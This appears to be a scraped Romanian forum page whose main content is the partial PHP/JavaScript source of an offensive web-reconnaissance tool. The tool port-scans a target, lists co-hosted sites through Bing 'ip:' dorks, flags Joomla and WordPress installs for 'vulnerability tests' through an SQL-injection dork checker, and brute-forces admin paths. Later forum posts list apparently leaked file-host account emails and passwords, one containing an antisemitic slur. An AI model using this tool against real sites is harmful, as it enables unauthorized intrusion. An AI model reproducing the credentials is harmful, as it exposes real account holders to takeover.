nomermax = 100; heavy = false; function ajax(vars, nom, cbFunction){ var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0"); var querystring = '?' + vars + '&page=' + nom; req.open("GET", querystring , true); req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); req.onreadystatechange = function(){ if (req.readyState == 4 && req.status == 200){ if (req.responseText){ cbFunction(req.responseText,vars); } } } req.send(null); } function showResult(str, vars){ var box = document.getElementById("result") if(str.match(/Warning|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />'; else box.innerHTML += str; if(!jalan){ box.innerHTML += '<span class=\"red\">*** </span> paused...<br />'; document.getElementById("loading").style.visibility = 'hidden'; document.getElementById("btnOk").value = "Resume"; } else { if(!str.match(/.*finish.*/gi)){ sqlCheck(vars); } else{ var pesan = str.substring(str.indexOf("|") + 1); box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />'; document.getElementById('setype').disabled = false; document.getElementById('dork').readOnly = false; document.getElementById("loading").style.visibility = 'hidden'; document.getElementById("btnOk").value = "Search"; nomer = 1; jalan = false; } } var oldYPos = 0, newYPos = 0; do{ if (document.all){ oldYPos = document.body.scrollTop; } else{ oldYPos = window.pageYOffset; } window.scrollBy(0, 50); if (document.all){ newYPos = document.body.scrollTop; } else{ newYPos = window.pageYOffset; } } while (oldYPos < newYPos); } function keyHandler(ev){ if (!ev){ ev = window.event; } if (ev.which){ keycode = ev.which; } else if (ev.keyCode){ keycode = ev.keyCode; } if (keycode == 13){ sikat(); } } String.prototype.trim = function() { return this.replace(/^\s*|\s*$/g, ""); } function sqlCheck(xdata){ if(jalan){ ajax(xdata, nomer, showResult); nomer++; } } function sqlHeavyCheck(xdata){ if(jalan){ ajax(xdata + '&heavy=1', nomer, showResult); nomer++; } } function sikat(){ var btext = document.getElementById("btnOk"); if((btext.value == 'Search') || (btext.value == 'Resume')){ if(!jalan){ if(btext.value == 'Search') nomer = 1; var target = document.getElementById('dork'); var setype = document.getElementById('setype'); if(target.value.trim().length>0) { document.getElementById("loading").style.visibility = 'visible'; document.getElementById("btnOk").value = "Pause"; target.readOnly = true; setype.disabled = true; jalan = true; sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value)); } } else alert("Please stop first..."); } else { berhenti(); } } function initpg(){ document.onkeypress = keyHandler; } function berhenti(){ jalan = false; } function bersih(){ var tanya = confirm("Clear results and restart?"); if(tanya == true) location.href = 'adm.php'; } function checkheavy_fix(){ var heavyval = document.getElementById("heavy"); if(heavyval.checked) heavyval.checked = false; else heavyval.checked = true; checkheavy(); } function checkheavy(){ var heavyval = document.getElementById("heavy").checked; var box = document.getElementById("result") if(heavyval) { heavy = true; box.innerHTML += '<span class=\"red\">*** </span> depth scan...<br />'; } else { heavy = false; box.innerHTML += '<span class=\"red\">*** </span> quick scan...<br />'; } } </script> <?php echo ' </head> <body> <br /> <br /> <h1 class="technique-two"> </h1> <div class="wrapper"> <table><tr><td> <div class="red"> <div class="tube"> <table width=100% style="background: #222; border: 1px solid #111;"><tr><td align=left><table><tr><td><img src="http://cdn4.iconfinder.com/data/icons/socialmediaicons_v120/32/website.png"></td><td><center><b>WebSite Party</b></center></td></table></table><br> <form action="" method="post" name="xploit_form"> URL:<br /><input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 100%;" /><br /><br /> 404 error page:<br /><input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 100%;" /><br /><br /> <span style="float: right;"><table><tr><td>Verified: <span id="verified">0</span> / <span id="total">0</span></td><td><input type="submit" name="xploit_submit" value="Search !" align="right" /></td></tr><tr><td><br>Stalk3R@live.CoM ***65533; www.sec4ever.com</td></tr></table></span> </form><br> '; ?> </div> <?php echo ' <br> </div> <!-- /tube --> </div> <!-- /red --> </td><td valign=top> '; if($_POST['xploit_submit']) { echo ' <div class="green"> <div class="tube" id="rightcol">'; echo ' Infos about website:<br> *******************/<br> <table width=100% style="background: #222; border: 1px solid #111;"> <td> <img src="http://open.thumbshots.org/image.pxf?url='.$_POST['xploit_url'].'"> </td> <td> <textarea style="width:100%;height:88px;background:#555;margin-left:-15px">If ROBOTS.TXT exist,you see it here '; $url_robots = str_replace("http://", "", $_POST['xploit_url']); $robots = 'http://'.$url_robots.'/robots.txt'; $affiche_robots = file_get_contents($robots); echo $affiche_robots; echo '</textarea></td></tr></table> <br> Ports scanner:<br> *************/ <div class="tube" id="portbox"> <table width=100% style="background: #222; border: 1px solid #111;"><tr><td> '; // Port scanner $port = array("21", "23", "25", "80", "110", "139", "445", "1433", "1521", "1723", "3306", "3389", "5900", "8080"); $port_name = array("(FTP)", "(TELNET)", "(SMTP)", "(HTTP)", "(POP3)", "(NETBIOS-SSN)", "(MICROSOFT-DS)", "(MS-SQL-S)", "(NCUBE-LM)", "(PPTP)", "(MYSQL)", "(MS-WBT-SERVER)", "()", "(WEBCACHE)"); $site = $_POST['xploit_url']; $site = str_replace("http://", "", $site); $ip_target = gethostbyname("".$site.""); for($i=0;$i<12;$i++) { $fp = fsockopen($ip_target,$port[$i],$errno,$errstr,0.1); if($fp) { echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>OPEN</b> on " . $ip_target . "<br>"; fclose($fp); } else { echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>CLOSED</b> on " . $ip_target . "<br>"; } flush(); } //------------------------------------------- echo ' </td></table></div> '; echo ' Found ones:<br /> ***********/<br>'; echo ' </div> <!-- /tube --> </div> <!-- /green --> </td></tr></table> <div class="yellow"> '; echo ' Websites on the server:<br> *********************/<br> '; if($_POST['xploit_submit']) { $dorkk = "ip:".$ip_target; $pageNum = 0; for($pageNum = 0; $pageNum < 10; $pageNum++) { $bing = file_get_contents("http://www.bing.com/search?q=".str_replace(" ","+",$dorkk)."&go=&filt=all&first=".$pageNum.""); if(!preg_match("/No results found for/",$bing)) { preg_match_all("/<h3><a href=\"(.*?)\">/",$bing,$sites); if(count($sites[1])==0) {return false;} for($i=0 ; $i < count($sites[1]);$i++) { $site2 = str_replace(array("http://","https://","www."),"",$sites[1][$i]); $site2 = substr($site2,0,strpos($site2,"/",0));; if(!in_array($site2,$arrayy)) { //Search for JOOMLA & WORDPRESS $headers_joomla = @get_headers("http://".$site2."/administrator"); $headers_wordpress = @get_headers("http://".$site2."/wp-admin"); if(strpos($headers_joomla[0],'404') === false) { $joomla = "joomla"; $site3 = $site2." (JOOMLA) | <a href='#' class='testvuln".$joomla.''.$i."'>TEST VULNERABILITY</a>"; echo $site3. "<br>"; ?> <script> //commentaudio $('.testvuln<?php echo $joomla.''.$i;?>').live("click",function() { $('#showtest<?php echo $joomla.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>'); $('#showtest<?php echo $joomla.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $joomla; ?>"); return false; }); </script> <div id="showtest<?php echo $joomla.''.$i;?>"> <p> </p> </div> <?php } elseif(strpos($headers_wordpress[0],'404') === false) { $wordpress = "wordpress"; $site3 = $site2." (WORDPRESS) | <a href='#' class='testvuln".$wordpress.''.$i."'>TEST VULNERABILITY</a>"; echo $site3. "<br>"; ?> <script> //commentaudio $('.testvuln<?php echo $wordpress.''.$i;?>').live("click",function() { $('#showtest<?php echo $wordpress.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>'); $('#showtest<?php echo $wordpress.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $wordpress; ?>"); return false; }); </script> <div id="showtest<?php echo $wordpress.''.$i;?>"> <p> </p> </div> <?php } else { echo $site2. " | <a href='#' class='testvuln".$i."'>TEST VULNERABILITY</a><br>"; $site4 = str_replace("www.", "", $site2); $site4 = str_replace("http://", "", $site2); ?> <script> $('.testvuln<?php echo $i;?>').live("click",function() { $('#showtest<?php echo "1".$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>'); $('#showtest<?php echo "1".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=bing&page=1"); $('#showtest<?php echo "2".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=google&page=1"); return false; }); </script> <div id="showtest<?php echo "1".$i;?>"> <p> </p> </div> <div id="showtest<?php echo "2".$i;?>"> <p> </p> </div> <?php } array_push($arrayy,$site2); } } $pageNum += 10; } } //$array = array_unique($uSites); //for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";} } echo ' </div> <br clear="all" /><br /> <div class="blue"> <div class="tube" id="logbox">'; echo ' Admin page Finder: <br /> ******************/<br /> </div> <!-- /tube --> </div> <!-- /blue --> </div> <!-- /wrapper --> <br clear="all">'; } } function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) { if($br == 1) $msg .= "<br />"; echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>"; if($stop == 1) exit; @flush();@ob_flush(); } function showport($site, $port) { if($br == 1) $msg .= "<br />"; echo "<script type=\"text/javascript\">insertcode('".$site."', '".$port."');</script>"; if($stop == 1) exit; @flush();@ob_flush(); } function check($x, $front=0) { global $_POST,$site,$false; if($front == 0) $t = $site.$x; else $t = 'http://'.$x.'.'.$site.'/'; $headers = get_headers($t); if (!eregi('200', $headers[0])) return 0; $data = @file_get_contents($t); if($_POST['xploit_404string'] == "") if($data == $false) return 0; if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0; return 1; } // -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- template(); if(!isset($_POST['xploit_url'])) die; if($_POST['xploit_url'] == '') die; $site = $_POST['xploit_url']; $site = str_replace("http://", "", $site); $site = "http://".$site; if ($site[strlen($site)-1] != "/") $site .= "/"; if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html"); $list['end'] = str_replace("\r", "", $list['end']); $list['front'] = str_replace("\r", "", $list['front']); $pathes = explode("\n", $list['end']); $frontpathes = explode("\n", $list['front']); show(count($pathes)+count($frontpathes), 1, 0, 'total', 1); $verificate = 0; foreach($pathes as $path) { show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($path) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0); show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0); } } preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1]; if(substr($site, 0, 3) == "www") $site = substr($site, 4); foreach($frontpathes as $frontpath) { show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0); show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0); } } } ?>
-
D3vtn, fi mai atent inainte sa faci postul.. Vrei mura-n gura?
-
Aelius, ai o inima de golan, si vorba de preot!
-
Uploadbaz.com ((Expiracion : 07/April/2014)) user : enferadi password : 123456 ----------------------- Rapidgator user: Christoph.Dannenberg@online.de password: danne00c ------------------------ ((ryushare.com)) : 1 year, user : bigshareshop password : 123123 ---------------------- Continua, si va urma... user : pavel_montes@yahoo.com password : pavel000 ----------------- Rapidgator.net Account Premium 2014 ---------------------------------- USER: bottjer.andy@gmail.com PASS: jewsdid911
-
- 1
-